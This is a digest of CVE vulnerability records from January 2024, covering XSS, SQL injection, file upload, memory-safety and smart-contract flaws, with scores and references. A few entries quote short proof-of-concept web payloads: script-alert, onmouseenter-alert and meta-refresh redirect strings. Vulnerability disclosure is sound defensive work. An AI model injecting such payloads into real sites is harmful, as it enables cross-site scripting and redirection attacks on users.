CVSS Score : 5.3

References :
https://vuldb.com/?ctiid.251674 | source : cna@vuldb.com
https://vuldb.com/?id.251674 | source : cna@vuldb.com
https://youtu.be/f_4eHkISrZg | source : cna@vuldb.com

Vulnerability : CWE-119


Vulnerability ID : CVE-2024-0713

First published on : 19-01-2024 14:15:13
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0713
Source : cna@vuldb.com
CVSS Score : 4.7

References :
https://drive.google.com/file/d/1C6_4A-96BtR9VTNSadUY09ErroqLEVJ4/view?usp=sharing | source : cna@vuldb.com
https://vuldb.com/?ctiid.251539 | source : cna@vuldb.com
https://vuldb.com/?id.251539 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2024-0728

First published on : 19-01-2024 19:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.

CVE ID : CVE-2024-0728
Source : cna@vuldb.com
CVSS Score : 4.7

References :
https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251551 | source : cna@vuldb.com
https://vuldb.com/?id.251551 | source : cna@vuldb.com

Vulnerability : CWE-73


Vulnerability ID : CVE-2024-0770

First published on : 21-01-2024 23:15:44
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0770
Source : cna@vuldb.com
CVSS Score : 4.4

References :
https://imagebin.ca/v/7nx8zv3l62Kf | source : cna@vuldb.com
https://vuldb.com/?ctiid.251670 | source : cna@vuldb.com
https://vuldb.com/?id.251670 | source : cna@vuldb.com

Vulnerability : CWE-276


Vulnerability ID : CVE-2024-0726

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.

CVE ID : CVE-2024-0726
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251549 | source : cna@vuldb.com
https://vuldb.com/?id.251549 | source : cna@vuldb.com

Vulnerability : CWE-79


Source : fluidattacks.com

Vulnerability ID : CVE-2024-0430

First published on : 22-01-2024 19:15:09
Last modified on : 22-01-2024 20:28:17

Description :
IObit Malware Fighter v11.0.0.1274 is vulnerable to a Denial of Service vulnerability by triggering the 0x8001E00C IOCTL code of the ImfHpRegFilter.sys driver.

CVE ID : CVE-2024-0430
Source : help@fluidattacks.com
CVSS Score : 5.5

References :
https://fluidattacks.com/advisories/davis/ | source : help@fluidattacks.com
https://www.iobit.com/en/malware-fighter.php | source : help@fluidattacks.com

Vulnerability : CWE-400


(13) LOW VULNERABILITIES [0.1, 3.9]

Source : github.com

Vulnerability ID : CVE-2024-22211

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability.

CVE ID : CVE-2024-22211
Source : security-advisories@github.com
CVSS Score : 3.7

References :
https://github.com/FreeRDP/FreeRDP/commit/939e922936e9c3ae8fc204968645e5e7563a2fff | source : security-advisories@github.com
https://github.com/FreeRDP/FreeRDP/commit/aeac3040cc99eeaff1e1171a822114c857b9dca9 | source : security-advisories@github.com
https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rjhp-44rv-7v59 | source : security-advisories@github.com

Vulnerability : CWE-122
Vulnerability : CWE-190


Vulnerability ID : CVE-2024-23329

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/<uuid>/history` can be accessed by any unauthorized user. As a result any unauthorized user can check one's watch history. However, because unauthorized party first needs to know a watch UUID, and the watch history endpoint itself returns only paths to the snapshot on the server, an impact on users' data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-23329
Source : security-advisories@github.com
CVSS Score : 3.7

References :
https://github.com/dgtlmoon/changedetection.io/commit/402f1e47e78ecd155b1e90f30cce424ff7763e0f | source : security-advisories@github.com
https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-hcvp-2cc7-jrwr | source : security-advisories@github.com

Vulnerability : CWE-863


Source : vuldb.com

Vulnerability ID : CVE-2024-0720

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0720
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link | source : cna@vuldb.com
https://vuldb.com/?ctiid.251544 | source : cna@vuldb.com
https://vuldb.com/?id.251544 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0721

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability.

CVE ID : CVE-2024-0721
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf | source : cna@vuldb.com
https://vuldb.com/?ctiid.251545 | source : cna@vuldb.com
https://vuldb.com/?id.251545 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0722

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0722
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link | source : cna@vuldb.com
https://vuldb.com/?ctiid.251546 | source : cna@vuldb.com
https://vuldb.com/?id.251546 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0773

First published on : 22-01-2024 00:15:07
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. Affected by this vulnerability is an unknown functionality of the file pages_client_signup.php. The manipulation of the argument Client Full Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251677 was assigned to this vulnerability.

CVE ID : CVE-2024-0773
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing | source : cna@vuldb.com
https://vuldb.com/?ctiid.251677 | source : cna@vuldb.com
https://vuldb.com/?id.251677 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0776

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms 2.0. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation with the input <div onmouseenter="alert("xss)"> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251678 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0776
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf | source : cna@vuldb.com
https://vuldb.com/?ctiid.251678 | source : cna@vuldb.com
https://vuldb.com/?id.251678 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0781

First published on : 22-01-2024 16:15:08
Last modified on : 22-01-2024 19:10:26

Description :
A vulnerability, which was classified as problematic, was found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_client_signup.php. The manipulation of the argument Client Full Name with the input <meta http-equiv="refresh" content="0; url=https://vuldb.com" /> leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251697 was assigned to this vulnerability.

CVE ID : CVE-2024-0781
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS | source : cna@vuldb.com
https://vuldb.com/?ctiid.251697 | source : cna@vuldb.com
https://vuldb.com/?id.251697 | source : cna@vuldb.com

Vulnerability : CWE-601


Vulnerability ID : CVE-2024-0782

First published on : 22-01-2024 17:15:09
Last modified on : 22-01-2024 19:10:26

Description :
A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0782
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing | source : cna@vuldb.com
https://vuldb.com/?ctiid.251698 | source : cna@vuldb.com
https://vuldb.com/?id.251698 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0716

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0716
Source : cna@vuldb.com
CVSS Score : 3.1

References :
https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251541 | source : cna@vuldb.com
https://vuldb.com/?id.251541 | source : cna@vuldb.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2024-0718

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543.

CVE ID : CVE-2024-0718
Source : cna@vuldb.com
CVSS Score : 2.4

References :
https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251543 | source : cna@vuldb.com
https://vuldb.com/?id.251543 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2016-15037

First published on : 21-01-2024 06:15:08
Last modified on : 22-01-2024 14:01:14

Description :
A vulnerability, which was classified as problematic, has been found in go4rayyan Scumblr up to 2.0.1a. Affected by this issue is some unknown functionality of the component Task Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.2 is able to address this issue. The patch is identified as 5c9120f2362ddb7cbe48f2c4620715adddc4ee35. It is recommended to upgrade the affected component. VDB-251570 is the identifier assigned to this vulnerability.

CVE ID : CVE-2016-15037
Source : cna@vuldb.com
CVSS Score : 2.4

References :
https://github.com/go4rayyan/CG1/commit/5c9120f2362ddb7cbe48f2c4620715adddc4ee35 | source : cna@vuldb.com
https://github.com/go4rayyan/CG1/releases/tag/v2.0.2 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251570 | source : cna@vuldb.com
https://vuldb.com/?id.251570 | source : cna@vuldb.com

Vulnerability : CWE-79


Source : lenovo.com

Vulnerability ID : CVE-2023-5081

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
An information disclosure vulnerability was reported in the Lenovo Tab M8 HD that could allow a local application to gather a non-resettable device identifier.

CVE ID : CVE-2023-5081
Source : psirt@lenovo.com
CVSS Score : 3.3

References :
https://support.lenovo.com/us/en/product_security/LEN-142135 | source : psirt@lenovo.com

Vulnerability : CWE-200


(93) NO SCORE VULNERABILITIES [0.0, 0.0]

Source : jpcert.or.jp

Vulnerability ID : CVE-2024-23387

First published on : 19-01-2024 04:15:09
Last modified on : 19-01-2024 15:56:26

Description :
FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product.

CVE ID : CVE-2024-23387
Source : vultures@jpcert.or.jp
CVSS Score : /

References :
https://github.com/fusionpbx/fusionpbx/ | source : vultures@jpcert.or.jp
https://jvn.jp/en/jp/JVN67215338/ | source : vultures@jpcert.or.jp
https://www.fusionpbx.com/ | source : vultures@jpcert.or.jp


Vulnerability ID : CVE-2024-22113

First published on : 22-01-2024 05:15:09
Last modified on : 22-01-2024 14:01:09

Description :
Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL.

CVE ID : CVE-2024-22113
Source : vultures@jpcert.or.jp
CVSS Score : /

References :
https://jvn.jp/en/jp/JVN73587943/ | source : vultures@jpcert.or.jp
https://www.anglers-net.com/anlog/update/ | source : vultures@jpcert.or.jp


Source : mitre.org

Vulnerability ID : CVE-2024-23659

First published on : 19-01-2024 05:15:09
Last modified on : 19-01-2024 15:56:26

Description :
SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js.

CVE ID : CVE-2024-23659
Source : cve@mitre.org
CVSS Score : /

References :
https://blog.spip.net/Mise-a-jour-de-maintenance-et-securite-sortie-de-SPIP-4-2-8-SPIP-4-1-14.html?lang=fr | source : cve@mitre.org
https://git.spip.net/spip/bigup/commit/0757f015717cb72b84dba0e9a375ec71caddf1c2 | source : cve@mitre.org
https://git.spip.net/spip/bigup/commit/ada821c076d67d1147a195178223d0b4a6d8cecc | source : cve@mitre.org


Vulnerability ID : CVE-2023-27168

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:26

Description :
An arbitrary file upload vulnerability in Xpand IT Write-back Manager v2.3.1 allows attackers to execute arbitrary code via a crafted jsp file.

CVE ID : CVE-2023-27168
Source : cve@mitre.org
CVSS Score : /

References :
https://balwurk.com | source : cve@mitre.org
https://balwurk.github.io/CVE-2023-27168/ | source : cve@mitre.org
https://writeback4t.com | source : cve@mitre.org
https://www.xpand-it.com | source : cve@mitre.org


Vulnerability ID : CVE-2023-43985

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
SunnyToo stblogsearch up to v1.0.0 was discovered to contain a SQL injection vulnerability via the StBlogSearchClass::prepareSearch component.

CVE ID : CVE-2023-43985
Source : cve@mitre.org
CVSS Score : /

References :
https://security.friendsofpresta.org/modules/2024/01/18/stblogsearch.html | source : cve@mitre.org
https://www.sunnytoo.com/product/panda-creative-responsive-prestashop-theme | source : cve@mitre.org


Vulnerability ID : CVE-2023-46351

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
In the module mib < 1.6.1 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The methods `mib::getManufacturersByCategory()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

CVE ID : CVE-2023-46351
Source : cve@mitre.org
CVSS Score : /

References :
https://mypresta.eu/modules/front-office-features/manufacturers-brands-images-block.html | source : cve@mitre.org
https://security.friendsofpresta.org/modules/2024/01/18/mib.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-50028

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
In the module "Sliding cart block" (blockslidingcart) up to version 2.3.8 from PrestashopModules.eu for PrestaShop, a guest can perform SQL injection.

CVE ID : CVE-2023-50028
Source : cve@mitre.org
CVSS Score : /

References :
https://addons.prestashop.com/en/express-checkout-process/3321-block-sliding-cart.html | source : cve@mitre.org
https://security.friendsofpresta.org/modules/2024/01/16/blockslidingcart.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-50030

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
In the module "Jms Setting" (jmssetting) from Joommasters for PrestaShop, a guest can perform SQL injection in versions <= 1.1.0. The method `JmsSetting::getSecondImgs()` has a sensitive SQL call that can be executed with a trivial http call and exploited to forge a blind SQL injection.

CVE ID : CVE-2023-50030
Source : cve@mitre.org
CVSS Score : /

References :
https://security.friendsofpresta.org/modules/2024/01/16/jmssetting.html | source : cve@mitre.org
https://www.joommasters.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51946

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.

CVE ID : CVE-2023-51946
Source : cve@mitre.org
CVSS Score : /

References :
http://actidata.com | source : cve@mitre.org
https://github.com/saw-your-packet/CVEs/blob/main/CVE-2023-51946/README.md | source : cve@mitre.org
https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx | source : cve@mitre.org


Vulnerability ID : CVE-2023-51947

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
Improper access control on nasSvr.php in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to read and modify different types of data without authentication.

CVE ID : CVE-2023-51947
Source : cve@mitre.org
CVSS Score : /

References :
http://actinas-plus-sl-2u-8-rdx.com | source : cve@mitre.org
https://github.com/saw-your-packet/CVEs/blob/main/CVE-2023-51947/README.md | source : cve@mitre.org
https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx | source : cve@mitre.org


Vulnerability ID : CVE-2023-51948

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
A Site-wide directory listing vulnerability in /fm in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to list the files hosted by the web application.

CVE ID : CVE-2023-51948
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/saw-your-packet/CVEs/blob/main/CVE-2023-51948/README.md | source : cve@mitre.org
https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx | source : cve@mitre.org


Vulnerability ID : CVE-2024-22876

First published on : 19-01-2024 14:15:13
Last modified on : 19-01-2024 15:56:19

Description :
StrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with Javascript code that will be executed in the context of the The Hive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application as helping an analyst becoming administrator.

CVE ID : CVE-2024-22876
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-002.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-22877

First published on : 19-01-2024 14:15:13
Last modified on : 19-01-2024 15:56:19

Description :
StrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened.

CVE ID : CVE-2024-22877
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-001.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-22562

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c.

CVE ID : CVE-2024-22562
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/210 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22563

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c.

CVE ID : CVE-2024-22563
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/openvswitch/ovs-issues/issues/315 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22920

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c.

CVE ID : CVE-2024-22920
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/211 | source : cve@mitre.org


Vulnerability ID : CVE-2023-47033

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction.

CVE ID : CVE-2023-47033
Source : cve@mitre.org
CVSS Score : /

References :
https://etherscan.io/address/0xF0C9975eFd521282c2DF55774251912d691aC4d9 | source : cve@mitre.org
https://github.com/RikkaLzw/CVE/blob/main/CVE-2024.1.19.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-47034

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors.

CVE ID : CVE-2023-47034
Source : cve@mitre.org
CVSS Score : /

References :
https://etherscan.io/address/0xdB94c67460DdaA9D6a9d6a2B855B5440f9afEb7C | source : cve@mitre.org
https://github.com/RikkaLzw/CVE/blob/main/CVE-2024.1.19-2.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-22911

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602.

CVE ID : CVE-2024-22911
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/216 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22912

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution.

CVE ID : CVE-2024-22912
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/212 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22913

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution.

CVE ID : CVE-2024-22913
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/213 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22914

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service.

CVE ID : CVE-2024-22914
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/214 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22915

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution.

CVE ID : CVE-2024-22915
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/215 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22919

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
swftools0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587.

CVE ID : CVE-2024-22919
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/209 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22955

First published on : 19-01-2024 18:15:09
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576.

CVE ID : CVE-2024-22955
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/207 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22956

First published on : 19-01-2024 18:15:09
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838

CVE ID : CVE-2024-22956
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/208 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22957

First published on : 19-01-2024 18:15:09
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190.

CVE ID : CVE-2024-22957
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/206 | source : cve@mitre.org


Vulnerability ID : CVE-2023-33295

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Cohesity DataProtect 6.8.1 and 6.6.0d was discovered to have a incorrect access control vulnerability due to a lack of TLS Certificate Validation.

CVE ID : CVE-2023-33295
Source : cve@mitre.org
CVSS Score : /

References :
https://cohesity.com | source : cve@mitre.org
https://github.com/cohesity/SecAdvisory/blob/master/CVE-2023-33295.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-43956

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 20:15:11

Description :
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2023-36263. Reason: This record is a duplicate of CVE-2023-36263. Notes: All CVE users should reference CVE-2023-36263 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage.

CVE ID : CVE-2023-43956
Source : cve@mitre.org
CVSS Score : /

References :


Vulnerability ID : CVE-2023-45485

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 20:15:11

Description :
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.

CVE ID : CVE-2023-45485
Source : cve@mitre.org
CVSS Score : /

References :


Vulnerability ID : CVE-2023-47035

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
RPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations.

CVE ID : CVE-2023-47035
Source : cve@mitre.org
CVSS Score : /

References :
https://etherscan.io/token/0x3b08c03fa8278cf81b9043b228183760376fcdbb | source : cve@mitre.org
https://github.com/RikkaLzw/CVE/blob/main/CVE-2024.1.19-3.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50447

First published on : 19-01-2024 20:15:11
Last modified on : 20-01-2024 18:15:31

Description :
Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).

CVE ID : CVE-2023-50447
Source : cve@mitre.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2024/01/20/1 | source : cve@mitre.org
https://devhub.checkmarx.com/cve-details/CVE-2023-50447/ | source : cve@mitre.org
